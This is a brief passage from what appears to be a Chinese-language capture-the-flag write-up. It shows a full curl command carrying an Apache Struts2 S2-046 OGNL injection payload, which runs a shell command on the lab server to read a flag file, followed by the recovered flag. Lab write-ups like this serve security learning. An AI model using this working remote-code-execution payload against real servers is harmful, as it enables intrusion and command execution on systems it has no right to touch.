2.清晨的第一缕阳光

cmd中输入这个命令,而后显示如下:(S2-046-1

curl -i -s -k -X POST -H "Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#cmd='type C:\\Users\\Administrator\\Desktop\\flag'). (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" [http://10.103.27.82:8080/api/docs/](http://10.103.27.82:8080/api/docs/)

flag{fLdSF0eDqcCIUNPY3BZ9W12bO7tEyk4r}

3.信息泄露引发的血案